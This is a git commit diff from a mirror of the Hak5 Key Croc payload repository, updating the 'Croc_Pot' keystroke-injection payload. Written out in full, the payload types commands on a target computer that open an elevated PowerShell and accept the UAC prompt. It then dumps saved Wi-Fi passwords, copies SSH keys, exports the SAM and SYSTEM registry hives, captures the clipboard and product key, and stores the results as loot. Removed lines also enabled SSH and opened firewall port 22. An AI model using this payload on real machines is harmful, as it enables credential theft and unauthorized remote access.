HAK5/keycroc-payloads
1
0
Fork 0
mirror of https://github.com/hak5/keycroc-payloads.git synced 2026-04-02 00:18:41 +01:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #69 from spywill/master

Browse Source 
update
This commit is contained in:
Peaks
2025-03-11 18:24:05 -04:00
committed by GitHub
parent a131e3b0ba 475d32914c
commit fcc4c5fe00
3 changed files with 1511 additions and 1232 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2090
payloads/library/general/Croc_Pot/Croc_Pot.sh
View File

File diff suppressed because it is too large Load Diff

651
payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt
View File

@@ -1,391 +1,354 @@
# Title: Croc_Pot Payload
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
# This will collect some data off target (ip address, current user name, target host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder
# Author: Spywill
# Version: 1.4.1
# Version: 1.4.6
# Category: Key Croc
MATCH crocpot
#---> Edit KEYCROC_PASSWD_HERE
#---> Edit KEYCROC_PASSWD_BELOW
CROC_PW=hak5croc
#---> Check for target pc saved passwd run CrocUnlock payload first if not edit below
if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
#---> Save keycroc passwd in temp folder, used for starting Reverse SSH Tunnel with Target
echo "$CROC_PW" > /tmp/CPW.txt
#---> Check for target saved passwd, run Croc_Unlock payload first if not edit below
if [ -f "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
TARGET_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
#---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX
TARGET_PW=LINUX_PASSWD_HERE
fi
#---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC
echo "${CROC_PW}" > /tmp/CPW.txt
#---> Create Croc_Pot directories
CROC_POT_DIR=(/root/udisk/tools/Croc_Pot /root/udisk/loot/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
#---> Create Croc_Pot folders
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
LED B
else
mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
fi
#---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
rm /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt
rm /root/udisk/tools/Croc_Pot/NumLock.txt
#---> remove existing OS detection
rm ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[1]}/sam ${CROC_POT_DIR[1]}/system
rm ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/target_email.txt
#---> Enter ethernet mode for OS detection
ATTACKMODE AUTO_ETHERNET
LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
GET TARGET_OS && echo "$TARGET_OS" | tee ${CROC_OS}
GET TARGET_IP && echo "$TARGET_IP" | tee -a ${CROC_OS}
GET TARGET_HOSTNAME && echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
#---> Keycroc built in functions, retrieve target Loot and save to tools/Croc_Pot/Croc_OS.txt
GET TARGET_OS && echo "$TARGET_OS" > "${CROC_POT_DIR[0]}/Croc_OS.txt"
GET TARGET_IP && echo "$TARGET_IP" >> "${CROC_POT_DIR[0]}/Croc_OS.txt"
GET TARGET_HOSTNAME && echo "$TARGET_HOSTNAME" >> "${CROC_POT_DIR[0]}/Croc_OS.txt"
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
QUACK DELAY 3000
#---> After OS detection case TARGET_OS value
case $TARGET_OS in
WINDOWS)
LED R
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
sleep 1
#---> Start windows powershell
Q GUI r ; sleep 1
Q STRING "powershell"
Q ENTER ; sleep 5
LED C
#---> Start windows powershell with administrator privileges
Q STRING "start-process powershell -verb runas ; exit"
Q ENTER ; sleep 3
Q LEFTARROW ; sleep 1
Q ENTER ; sleep 3
QUACK GUI m
QUACK GUI r ; QUACK DELAY 2000
QUACK STRING "powershell Start-Process powershell -Verb runAs"
QUACK ENTER ; QUACK DELAY 5000
QUACK ALT y ; QUACK DELAY 5000
#---> Check numlock state on or off
Q STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }"
Q ENTER ; sleep 2
QUACK STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }"
QUACK ENTER ; QUACK DELAY 2000
#---> Place keycroc usb drive into variable
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
Q ENTER ; sleep 2
QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
QUACK ENTER ; QUACK DELAY 2000
#---> Save numlock state to tools/Croc_Pot/Numlock.txt
Q STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\NumLock.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 3
QUACK STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\NumLock.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 3000
#---> Ping network to look for Shark Jack
Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER ; sleep 3
QUACK STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\shark_ip.txt\" -append"
QUACK ENTER ; QUACK DELAY 3000
#---> Place Shark Jack IP into variable
Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
Q ENTER ; sleep 2
QUACK STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\shark_ip.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve packet squirrel MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\squirrel_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Ping network to look for Lan turtle
Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
Q ENTER ; sleep 3
QUACK STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle IP if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\turtle_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Place Lan turtle IP into variable
Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
Q ENTER ; sleep 2
#---> sed to remove powershell output "\r" endlines
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to return only readable character
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to remove powershell output first "?" character
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to replace "-" with ":"
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1
#----> Check with nmap SSH status of target pc
#----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22:
case $(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered') in
open)
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
closed)
Q STRING "Service sshd is Closed trying to Enable SSH Server" ; Q ENTER ; sleep 2
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
Q ENTER ; sleep 2
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
Q ENTER ; sleep 2
Q STRING "restart-service sshd"
Q ENTER ; sleep 2
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
filtered)
Q STRING "Service sshd is filtered trying to Enable SSH Server" ; Q ENTER ; sleep 2
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
Q ENTER ; sleep 2
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
Q ENTER ; sleep 2
Q STRING "restart-service sshd"
Q ENTER ; sleep 2
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
*)
Q STRING "Service sshd unknow" ; Q ENTER ; sleep 1 ;;
esac
sleep 6 ; Q ENTER ; sleep 2 ;;
QUACK STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\turtle_mac.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\bunny_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"loot\Croc_Pot\SSH\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target E-mail, Unreliable
QUACK STRING "\$TARGET_EMAIL = Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Last 1 | Select-Object -ExpandProperty PrimaryOwnerName; if (-not \$TARGET_EMAIL) {\$TARGET_EMAIL = (Get-WmiObject -Class \"Win32_OperatingSystem\").RegisteredUser}; if (\$TARGET_EMAIL -match '^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})\$') {\"\$TARGET_EMAIL\" | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\target_email.txt\"}"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target, windows product key
QUACK STRING "(Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey | out-file -encoding UTF8 \"\$MOUNT_POINT\loot\Croc_Pot\Windows_ProductKey.txt\""
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target file Structure
QUACK STRING "tree /f /a | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Target_File_Structure.txt\""
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target registry hives
QUACK STRING "reg export HKEY_LOCAL_MACHINE\SAM (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"); reg export HKEY_LOCAL_MACHINE\SYSTEM (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\")"
QUACK ENTER ; QUACK DELAY 45000
QUACK STRING "Compress-Archive -Path (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"), (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\") -DestinationPath (Join-Path -Path \$env:TEMP -ChildPath \"registry_archive.zip\") -Force"
QUACK ENTER ; QUACK DELAY 35000
QUACK STRING "Move-Item -Path (Join-Path -Path \$env:TEMP -ChildPath \"registry_archive.zip\") -Destination (Join-Path -Path \$MOUNT_POINT -ChildPath \"\loot\Croc_Pot\registry_archive.zip\") -Force -ErrorAction SilentlyContinue"
QUACK ENTER ; QUACK DELAY 8000
QUACK STRING "Remove-Item -Path (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"), (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\")"
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve content of the clipboard
QUACK STRING "Get-Clipboard | Tee-Object -FilePath \"\$MOUNT_POINT\tools\Croc_Pot\Target_Clipboard.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
;;
MACOS)
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
LED G ; sleep 1
LED G ; QUACK DELAY 1000
#---> Start mac os terminal
Q GUI-SPACE ; sleep 1
Q STRING "terminal"
Q ENTER ; sleep 1 ;;
QUACK GUI-SPACE ; QUACK DELAY 1000
QUACK STRING "terminal"
QUACK ENTER
;;
LINUX)
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
LED B ; sleep 3
LED B
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
case $TARGET_HOSTNAME in
raspberrypi)
#---> Start Raspberry pi 4 LXTerminal
Q CONTROL-ALT-d
Q CONTROL-ALT-t
sleep 2
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
Q ENTER ; sleep 1
QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc/tools/Croc_Pot"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "MOUNT_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
QUACK ENTER ; QUACK DELAY 2000
#---> Check numlock state on or off
Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt"
Q ENTER ; sleep 1
if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then
Q NUMLOCK
QUACK STRING "cat /sys/class/leds/input*::numlock/brightness | uniq | tee \$MOUNT_POINT/NumLock.txt"
QUACK ENTER ; QUACK DELAY 2000
if [ "$(sed -n 1p ${CROC_POT_DIR[0]}/NumLock.txt)" = 0 ]; then
QUACK NUMLOCK
sleep 2
fi
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "whoami | tee \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP, MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "ip -o link show | awk '/wlan/{print \$2}' | cut -d':' -f1 | head -n1 | xargs -I{} sh -c 'ip addr show {} | awk \"/inet / {print \\\$2}\" | cut -d/ -f1; ip link show {} | awk \"/ether/ {print \\\$2}\"' | tee -a \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "sudo grep -H -E 'ssid=|psk=' /etc/NetworkManager/system-connections/* | sed 's|/etc/NetworkManager/system-connections/||' | sed 's|.nmconnection:| |' | awk 'NR%2{printf \"%s\n\", \$2; next} {printf \"%s\n\", \$2}' | tee -a \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP, MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "ping -c 1 -w 1 shark.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 && arp -n shark.lan | awk '/^[0-9]/ {print \$3}' | tee \$MOUNT_POINT/shark_ip.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve packet squirrel IP, MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "arp -n squirrel.lan | awk '/^[0-9]/ {print \$3}' && ping -c 1 -w 1 squirrel.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 | tee \$MOUNT_POINT/squirrel_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve turtle IP, MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "ping -c 1 -w 1 turtle.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 && arp -n turtle.lan | awk '/^[0-9]/ {print \$3}' | tee \$MOUNT_POINT/turtle_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee \$MOUNT_POINT/bunny_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "sudo cp -fr ~/.ssh/. \$MOUNT_LOOT/SSH/"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target file Structure
QUACK STRING "tree -f -a | tee \$MOUNT_POINT/Target_File_Structure.txt > /dev/null"
